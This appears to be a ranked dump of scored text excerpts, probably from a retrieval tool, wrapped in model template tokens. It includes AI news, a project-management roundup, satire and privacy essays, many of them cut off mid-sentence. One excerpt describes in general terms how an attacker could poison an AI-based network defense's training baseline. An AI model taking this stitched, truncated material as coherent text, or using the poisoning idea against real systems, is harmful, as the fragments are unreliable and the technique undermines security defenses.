build into AI. We might be able to build it into AI (I kind of +================================================================================ +Rank = 1; Score = 3080192.0 +<|begin_of_text|>New project management articles published on the web during the week of July 4 – 10. And this week’s video: Nick Bostrom’s TED talk on why machine learning will eventually require machines to have human values. + +Must read! + +Art Petty points to Volkswagen as example of what happens when an ethical lapse allows an organization to take a shortcut to success. + +Daniel Newman looks into the business potential of chatbots and deep learning. If you manage projects with customer-facing capabilities, this stuff is in your near future. + +Henny Portman describes the changes to the latest refresh of the Scrum Guide. + +Established Methods + +Nick Pisano makes an elegant case for trial and error, and always being in a yellow status. + +Glen Alleman builds on the baseball metaphor in “Moneyball” to illustrate the need to manage software development, based on continuous analysis. + +Harry Hall recounts a recent health scare to illustrate how to identify and deal with “sneaky” risks. + +Mike Cohn recommends two simple actions that will help meeting participants be more mindful. + +Isidora Roskic covers the basics of stakeholder management, from a team perspective. + +Cornelius Fichtner interviews test preparation coach Julie DeSot on how to identify the correct answer in the PMP exam. Just 39 minutes, safe for work. + +Agile Methods + +Ryan Ripley interviews Ellen Gottesdiener on the importance of discovery as an enabler of delivery. Just 17 minutes, safe for work. + +David Taber has some very specific recommendations for making Agile methods and traditional waterfall concepts work together. + +Jeff Himmelright shares an interactive team training exercise in responding to unexpected contingencies, inspired by a scene in Apollo 13. + +Aaron Smith summarizes the key findings in the recent Changepoint study, “Business Agility: Is It Easy to Pivot?” + +Applied Leadership + +Braden Kelly expounds on the value of thought leadership. + +Apple Pineda explains why it takes a different approach to earn a Millenial’s loyalty. + +Andy Jordan looks at some of the issues related to managing multiple generations in the workplace. + +David Cotgreave notes that project risk management and handling requires a team where everyone’s opinion is considered – not just the leader’s. + +Brad Egeland lists a few reasons why the human touch is still needed in project management – robots need not apply. + +Working and the Workplace + +Bertrand Duperrin describes the need to “consumerize” the workplace: “If they had to pay to rent the workplace, would they pay or look for another place?” + + +================================================================================ +Rank = 2; Score = 2588672.0 +<|begin_of_text|>DeepMind + +When DeepMind burst into prominent view in 2014 it taught its machine learning systems how to play Atari games. The system could learn to defeat the games, and score higher than humans, but not remember how it had done so. + +DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose DeepMind DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose + +Advertisement + +For each of the Atari games, a separate neural network had to be created. The same system could not be used to play Space Invaders and Breakout without the information for both being given to the artificial intelligence at the same time. Now, a team of DeepMind and Imperial College London researchers have created an algorithm that allows its neural networks to learn, retain the information, and use it again. + +"Previously, we had a system that could learn to play any game, but it could only learn to play one game," James Kirkpatrick, a research scientist at DeepMind and the lead author of its new research paper, tells WIRED. "Here we are demonstrating a system that can learn to play several games one after the other". + +Read next DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass + +The work, published in the Proceedings of the National Academy of Sciences journal, explains how DeepMind's AI can learn in sequences using supervised learning and reinforcement learning tests. This is also explained in a blog post from the company. + +Watch Google's Deep Mind complete Montezuma's Revenge Gaming Watch Google's Deep Mind complete Montezuma's Revenge + +Advertisement + +"The ability to learn tasks in succession without forgetting is a core component of biological and artificial intelligence," the computer scientists write in the paper. Kirkpatrick says a "significant shortcoming" in neural networks and artificial intelligence has been its inability to transfer what it has learned from one task to the next. + +The group says it has been able to show "continual learning" that's based on'synaptic consolidation'. In the human brain, the process is described as "the basis of learning and memory". + +The performance of DeepMind's EWC algorithm 'enhanced' neural network compared to its other nets DeepMind / PNAS + +Read next DeepMind's latest AI breakthrough is its most significant yet DeepMind's latest AI breakthrough is its most significant yet +================================================================================ +Rank = 3; Score = 2244608.0 +<|begin_of_text|>It used to be science fiction, often scarily so. HAL in Stanley Kubrick's 1968 film 2001: A Space Odyssey still perfectly expresses the fear that when our technology becomes smarter than we are it won't necessarily like us. This unease reaches its peak in the Terminator films, in which Skynet takes over the world's weapons systems and tries to exterminate humanity, and the Asimov-derived I, Robot, which features a robot rebellion. + +In I, Robot, Will Smith's character faces a robot rebellion. + +Alongside them there are more thoughtful explorations of the intersection between artificial and human intelligence, like Spielberg's AI (2001), which features a robot boy programmed to have human emotions, and Her (2013), in which a lonely man develops a relationship with a computer programme designed to meet his every need. + +But science fiction and science fact are colliding. As artificial intelligence (AI) catches up with human intelligence and machines become more and more autonomous, roboticists are increasingly asking about ethics. If a machine is capable of making a decision, what are the moral principles that guide that decision? Can a robot have a conscience? And if so, how is that conscience to be designed and developed? And on the further fringes of the debate, can a robot sin? + +According to Computer Business Review (CBR), a group of investors is putting $27 million into a fund designed to answer questions like this. They're supporting the Ethics and Governance of Artificial Intelligence Fund, which is being overseen by the MIT Media Lab and the Berkman Klein Centre for Internet and Society at Harvard University. + +The idea, says CBR, is to apply the humanities, social sciences, and other non-tech disciplines to the development of AI. According to Reid Hoffman, founder of LinkedIn and partner at venture capital firm Greylock Partners: "There's an urgency to ensure that AI benefits society and minimizes harm. + +"AI decision-making can influence many aspects of our world – education, transportation, health care, criminal justice, and the economy – yet data and code behind those decisions can be largely invisible." + +Over in the UK, the government is launching an ethics board to be based at the Alan Turing Institute. + +Among examples of semi-autonomous robots are the self-drive cars being pioneered by firms like Google and Tesla. They can be programmed to avoid accidents, but what happens when they're faced with a choice between two accidents? A human being might be able to make a moral decision about which is worst, but a robot doesn +================================================================================ +Rank = 4; Score = 2129920.0 +<|begin_of_text|>WALTHAM, MA – Researchers at Boston Dynamics say science is still decades away from producing robots that can approximate the cruelty and malice of their human creators. + +“Even with the prevalence of military drone strikes, robots are entirely reliant on human involvement to carry out brutal acts of senseless violence. It is difficult to deploy robots in creative savagery, which humans excel at,” says Dr. Sergei K. Vladimirovich, lead researcher at CrueLab. + +“We have a lot of work ahead of us.” + +Currently, humanity’s most advanced artificially intelligent robots can be placed side-by-side with small, defenceless creatures without them ever bothering to torture, maim or kill them, an action that comes naturally to most young children, especially boys. + +“Adorable bunnies, squishy frogs, even gross bugs – every single one of these creatures went unscathed in our tests,” said Vladimirovich. + +Vladimirovich even personally demonstrated how to inflict harm on these animals but the machine learning algorithm reportedly kept asking, ‘why?’ + +Still, futurist Ray Kurzweil has predicted that, given the exponential growth of artificial intelligence, it’s only a matter of time before robots will match, and then outpace, humanity’s vicious savagery. + +“First robots will start by creating passive aggressive tweets toward us, then they will replace your average Bell customer service representative. Eventually you’ll see machine driver’s license testers, insurance adjusters, corporate lawyers and CEOs of major tech companies.” + +At press time, that BigDog robot is getting sick and tired of being kicked.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 5; Score = 2072576.0 +<|begin_of_text|>Summary (details follow) + +Google provides an early-stage variant of a general-purpose AI (GP-AI). + +Other providers of an early-stage GP-AI include IBM, Microsoft, Facebook, Amazon, Apple, and Samsung. + +Google and its AI competitors are likely to be operating under the assumption that one GP-AI could become the runaway market leader. Their likely thinking: + +The more users a GP-AI has, the smarter it gets. The smarter a GP-AI gets, the more new users it will attract. + +Google can produce multiple comedy series that showcase its AI being funny and getting smarter. In particular, these comedies can showcase Google’s AI getting smarter about facilitating group flow. This variant of flow: + +is a top enabler of professional success for group members + +often sparks romantic/sexual attraction between group members + +Google’s flowmantic comedies could become very popular, not least because: + +comedy and increased prospects of money and (great) sex stimulate the part of the brain called the nucleus accumbens + +the nucleus accumbens mediates psychological addiction (i.e., manufactures cravings) + +So Google’s comedies could enable Google’s AI to gain enough users to achieve escape velocity, the precursor to runaway market leadership. + +Fun fact: Popular comedies typically generate a lot of revenue directly (e.g., via advertising, product placement). + +Via comedy, then, the popularizing of Google’s AI could be run as a profit center. + +So Google’s AI competitors... + +I shared this article with Google by responding to the company’s October 2016 job post seeking a comedy writer for Google’s AI. + +So, again, Google wanting its AI to be funny portends... + +Re: early-stage GP-AI + +“[T]he first genuine AI will not be birthed in a stand-alone supercomputer, but [rather] in the superorganism of a billion computer chips known as the ‘Net.... Any device [e.g., a smartphone] that touches this networked AI will share — and contribute to — its intelligence.” + +— From 2016 book The Inevitable: Understanding the 12 Technological Forces That Will Shape Our Future, by the founding executive editor of Wired magazine + +Re: Google’s AI + +“Google Assistant, a voice-activated digital helper [that]... ‘learns’ about your habits and day-to-day activities and carries out ‘conversation actions’ to serve you. It also draws on information in your Google accounts. The more it knows about how +================================================================================ +Rank = 6; Score = 1556480.0 +<|begin_of_text|>Sarah Hassan of Somerville won the UMass Boston six-word story contest. + +“American? But what are you, really?” + +Sarah Hassan, a freshman at UMass Boston, read the poignant line to a campus center lounge packed nearly full of students and faculty on Wednesday, Nov. 7. It sounded like the beginning of poem, but it was already over. + +[an error occurred while processing this directive] + +Hassan’s “short story” was the winning entry for the school’s first ever six-word story contest. The contest, put together by UMass Boston’s creative writing department, was inspired by Ernest Hemingway’s legendary six-word story: “For sale: baby shoes, never worn.” + +“The challenge is to tell a complete story, with a sense of conflict, development and revelation,” said the school’s director of undergraduate creative writing, Tom O’Grady. “It’s amazing to be able to do that in six words.” + +Over 100 students emailed in their entries over the last couple months. Creative writing teachers whittled down the total of 212 super-short stories to 20 of the best that were read to an enthusiastic audience Wednesday. The writers of the top three stories received gift cards to the campus bookstore. + +Some of the entries were comical – “Ten items or less. Thirteen. Damnit.” Some were tragic – “Dear love, he’s back, I’m leaving.” And some were both – “Engagement ring, wedding ring, suffer ring.” + +They came from English majors and chemistry majors, from freshmen and seniors, and from serious writers who spent hours on their stories and those who participated because it was “easy.” + +Steeve Joazard (pictured above right), a senior English major, submitted a story that was chosen as one of the two runners-up: “Seeds don’t take in her garden.” + +“[The contest] seemed fun and interesting,” he said before the event started. “I worked on it for hours…it took up a good portion of my day.” + +Josh Weiss (pictured at left), +================================================================================ +Rank = 7; Score = 1441792.0 +<|begin_of_text|>Canonical's flagship Ubuntu phone is an interesting beast. Business Insider If you walked into any bar in Europe or the US and asked if anyone had heard of the "Ubuntu" phone, you would count the positive responses on one hand. + +And almost certainly none of them would own an Ubuntu phone, because everyone uses iPhone or Android. + +Ubuntu is an open-source operating system that only really has a name in IT and developer communities. "Open source" is a special category of software that is free for anyone to use and/or develop, regardless of copyright. + +Ubuntu is based on Linux, the same underlying code that powers data centres and household-name operating systems like Android. So the chances are you have actually used something powered by Ubuntu at some point in your life already, albeit indirectly. + +However, Ubuntu is not going to sit in the backroom forever. The company that makes it, Canonical, has been working on a mobile version of Ubuntu capable of taking on Google's Android system. That work that has born fruit this year with the arrival of the firm's flagship Meizu MX4 Ubuntu edition smartphone. + +Now, I'm sure most of you reading this article are asking "why should I care about Ubuntu phone?" + +The Holy Grail of technology + +I'll tell you why. Canonical is actually one of the most advanced and forward-looking companies when it comes to creating the Holy Grail of technologies, a "ubiquitous operating system." + +What does this mean? + +A ubiquitous operating system is a platform where all devices, regardless of whether they're a phone, tablet, smartwatch, smart thermostat or even smart traffic light, run using the same back-end technology and are able to talk to each other. You'll hear tech folks refer to this idea when they talk about the Internet of Things (IoT) or machine learning. + +If realised, this dream would make it so that things like our smartphones could not only detect but also predict and serve our needs without us having to lift a finger. + +The Ubuntu phone is a massive part of Canonical's plan to make this happen. It aims to completely rethink the way we interact with our smartphones and our smartphones interact with us. + +After a solid month using it, let me tell you, while there are some growing pains, Ubuntu's phone offering is a startling piece of technology that left me wishing our machine carers - and potential overlords - would arrive sooner. + +The Meizu MX4 Ubuntu Edition is currently only being sold in Europe as a promotional competition model. The competition requires people interested in buying the phone, which carries a +================================================================================ +Rank = 8; Score = 1425408.0 +<|begin_of_text|>Gigaom, Baidu Ventures and Comet Labs Angling for Piece of AI Pie + +Sam DeBrule Blocked Unblock Follow Following Mar 6, 2017 + +Two AI announcements worth noting from the end of last week. Comet Labs’s announced a partnership with Baidu Ventures and Gigaom will start offering AI-related consulting services. + +Let’s see how either could affect you. + +Comet Labs, an AI-focused VC firm and research lab that prides itself on offering services to startups “they can’t buy with money.” Basically, they can now offer startups access to Chinese partners and reduce the nightmare for startups working with manufacturers there. Baidu Ventures gets better access to the US startup market. + +Gigaom will be approaching the market from a different angle. Most companies are aware that “AI will transform everything–every business, every department, every job, everything,” but few people can tell you what AI or machine learning actually is or does. That’s where Gigaom will step in, with their plans to strategize, implement, build, and rollout AI projects alongside their clients. + +Join 11,000 readers and subscribe to the 🤖Machine Learnings🤖 newsletter to see how AI will impact your future. + +Have a friend working on an AI startup? Curious about how AI could actually help your larger company? Check out the full announcements:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 9; Score = 1261568.0 +<|begin_of_text|>I. The Back Door His name is not Opsec, but I will call him that to guard his privacy. In webspace he is known as a grand master of the dark art of hacking. He is one of a small elite—maybe a hundred, maybe fewer—all of whom are secretive and obsessed with security. They do not talk about their work with their families. They generally do not talk to the press. Nonetheless, through friends of friends, Opsec agreed to speak and to introduce me to his perspectives. In “meatspace,” as he and others like him call the real world, Opsec lives in a metropolitan area in a little wooden house by a railroad track. He is in his mid-30s, physically imposing, and not a geek. He hangs out in a local bar, where the regulars know vaguely that he works with computers. He is a fast talker when he’s onto a subject. His mind seems to race most of the time. Currently he is designing an autonomous system for detecting network attacks and taking action in response. The system is based on machine learning and artificial intelligence. In a typical burst of words, he said, “But the automation itself might be hacked. Is the A.I. being gamed? Are you teaching the computer, or is it learning on its own? If it’s learning on its own, it can be gamed. If you are teaching it, then how clean is your data set? Are you pulling it off a network that has already been compromised? Because if I’m an attacker and I’m coming in against an A.I.-defended system, if I can get into the baseline and insert attacker traffic into the learning phase, then the computer begins to think that those things are normal and accepted. I’m teaching a robot that ‘It’s O.K.! I’m not really an attacker, even though I’m carrying an AK-47 and firing on the troops.’ And what happens when a machine becomes so smart it decides to betray you and switch sides?” Opsec lives in a hall of mirrors. He understands that webspace and meatspace, though connected, remain largely distinct. Given sufficient motivation and time, Opsec can break into almost any secure network without setting off alarms. Breaking in used to thrill him, because once inside he could roam as he liked, but success comes too easily now: with such an attack, he has to find only a single way in. By contrast, defense presents the challenge of out-thinking every aggressor. This appeals +================================================================================ +Rank = 10; Score = 1220608.0 +<|begin_of_text|>“Black people are hard. They don’t feel pain the way you do.” Teju Cole tweeted this yesterday, along with a link to an article on Slate from last June, “I Don’t Feel Your Pain,” in which the topic of empathy was explored in relation to America’s ongoing racial disparities, and the ways in which lack of empathy strengthens them. In the essay, author Jason Silverstein writes, “for many people, race does matter, even if they don’t know it. They feel more empathy when they see white skin pierced than black. This is known as the racial empathy gap.” Multiple studies have confirmed that people—all races, not just white people, and all education levels and professions, including medical personnel—”assume black people feel less pain than white people.” Silverstein explains that this has led to situations where “because they are believed to be less sensitive to pain, black people are forced to endure more pain,” including, but not limited to, receiving less anesthesia and pain medication than they would if they were white. Beyond this disparate treatment in the world of healthcare, it is believed that this racial empathy gap is at least partially responsible for the vast difference in prison sentences handed down to black men and women in comparison with those given to white people convicted of the same crimes. And because, remarkably, this empathy gap, this internalized assumption that black people, as Cole put it, “don’t feel pain the way you do,” is actually employed by people of every race and of every class, it can’t be shrugged off as something that only the most vile racists think or feel. It’s a systemic problem that, Silverstein concludes, needs to be addressed by “perspective-taking exercises” and “empathy induction” in order to combat the stereotypes that are engrained in most of us. + +But so, Cole wasn’t the only one with empathy on the brain. An editorial in the New York Times, “Rich People Just Care Less,” also addressed the empathy gap, only instead of looking at it in racial terms, it was explored by looking at economic and class differences, and how those effect who exactly Americans want to help. The fact that race, class, and economic privilege are all things that overlap is no coincidence, as the bottom line turns out to be that “research shows that people with the most social power pay scant attention to those with little such power.” The author of this piece, Daniel Goleman, believes that the rapidly rising economic inequality in this country is due to the fact that +================================================================================ +Rank = 11; Score = 1196032.0 +<|begin_of_text|>In the report, titled "China's Rise in Artificial Intelligence," the investment bank said the world's second-largest economy has emerged as a major global contender in using AI to drive economic progress. + +Goldman said the government and companies have identified AI and machine learning as the next big areas of innovation. + +"We believe AI technology will become a priority on the government's agenda, and we expect further national/regional policy and funding support on AI to follow," the bank said. + +AI is already widespread: From simple smartphone applications that can tell the weather to complex algorithms that are able to easily beat humans in board games. + +Companies such as Google and Microsoft have poured vast amounts of money into research and development to expand the horizon of what AI can achieve. Machines are fed large quantities of data and taught specific tasks, allowing companies to create software that can learn and become smarter. + +While the United States is generally considered to be leading the field, other countries are catching up. China, home of internet powerhouses such as Baidu, Alibaba and Tencent, is one of them. + +In July, China's State Council issued guidelines on developing AI inside the country and set a goal of becoming a global innovation center for it by 2030. It expects the total output value of AI industries to surpass 1 trillion yuan ($147.80 billion). + +The Council encouraged the creation of open-source computing platforms and training more AI professionals and scientists. The guidelines said the government will invest in qualified AI projects and encourage private capital investment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 12; Score = 1179648.0 +<|begin_of_text|>Image caption IBM's processors replicate the system of synaptic connections found in the human brain + +IBM has developed a microprocessor which it claims comes closer than ever to replicating the human brain. + +The system is capable of "rewiring" its connections as it encounters new information, similar to the way biological synapses work. + +Researchers believe that by replicating that feature, the technology could start to learn. + +Cognitive computers may eventually be used for understanding human behaviour as well as environmental monitoring. + +Dharmendra Modha, IBM's project leader, explained that they were trying to recreate aspects of the mind such as emotion, perception, sensation and cognition by "reverse engineering the brain." + +The SyNAPSE system uses two prototype "neurosynaptic computing chips". Both have 256 computational cores, which the scientists described as the electronic equivalent of neurons. + +One chip has 262,144 programmable synapses, while the other contains 65,536 learning synapses. + +Man machine + +In humans and animals, synaptic connections between brain cells physically connect themselves depending on our experience of the world. The process of learning is essentially the forming and strengthening of connections. + +A machine cannot solder and de-solder its electrical tracks. However, it can simulate such a system by "turning up the volume" on important input signals, and paying less attention to others. + +IBM has not released exact details of how its SyNAPSE processor works, but Dr Richard Cooper, a reader in cognitive science at Birkbeck, University of London said that it likely replicated physical connections using a "virtual machine". + +Instead of stronger and weaker links, such a system would simply remember how much "attention" to pay to each signal and alter that depending on new experiences. + +Image caption IBM's processor replicates the synaptic connections between neurons found in the brain + +"Part of the trick is the learning algorithm - how should you turn those volumes up and down," said Dr Cooper. + +"There's a a whole bunch of tasks that can be done just with a relatively simple system like that such as associative memory. When we see a cat we might think of a mouse." + +Some future-gazers in the cognitive computing world have speculated that the technology will reach a tipping point where machine consciousness is possible. + +However, Dr Mark Bishop, professor of cognitive computing at Goldsmiths, was more cautious. + +"[I] understand cognition to be something over and above a process simulated by the execution of mere computations, [and] see such claims as verging on the magical," he said. + +IBM's work +================================================================================ +Rank = 13; Score = 1105920.0 +<|begin_of_text|>Portrait of the Artist's Mother, by Juan Gris + +When the digital media pioneer and visionary Jaron Lanier signs his new book, Who Owns The Future?, he circles the “Who” and draws an arrow to the reader’s name, achieving a visual haiku of his message: Each of us, by name, generates a great amount of profit for the Internet’s corporations as they use our personal information for targeted advertising or sell it to third-parties for future use. He wants to know what are we going to do about it. + +“Few people realize the degree to which they are being tracked and spied upon in order that this new form of currency can be created,” Lanier says. + +That currency is our private lives. + +In his May 3rd, 2013, talk at Brooklyn’s Powerhouse Arena, Lanier pointed out that social networking sites (such as Twitter, Facebook, Google, and LinkedIn) have not only changed the way we socialize and exchange ideas, they have also become information machines. Many perceive that these companies have merely given us new, free ways to stay in touch with friends or foster professional connectivity, but the reality is that this convenience comes with enormous costs: personal data collection. Lanier and others think the rapid shift to technological information consolidation and analysis of citizen identities, combined with the massive economic wealth of the companies, has big implications for individual privacy, and could also significantly influence the future of our political system. + +In a recent research project exploring the implications of this new reality on individuals, Alessandro Acquisti, a professor who does research on economics of privacy at Carnegie Mellon, showed how easy it is for digital technology to break through the walls around our personal lives. Using only an unknown person’s photograph, publicly available face recognition software (nowhere as sophisticated as Facebook, et al.), distributed computing, and information from social network sites, he could easily procure information including Social Security numbers, driver’s license numbers, and credit and debit card numbers—more than enough to commit identity theft. Our online personas and offline lives have merged, in what Acquisti says will soon be a seamless “augmented reality.” + +In his latest study, Silent Listeners: The Evolution of Privacy and Disclosure on Facebook, Acquisti and fellow authors found that more people than ever do everything they can online to keep their personal information private. However, the level of personal information disclosure has continued to rise due to 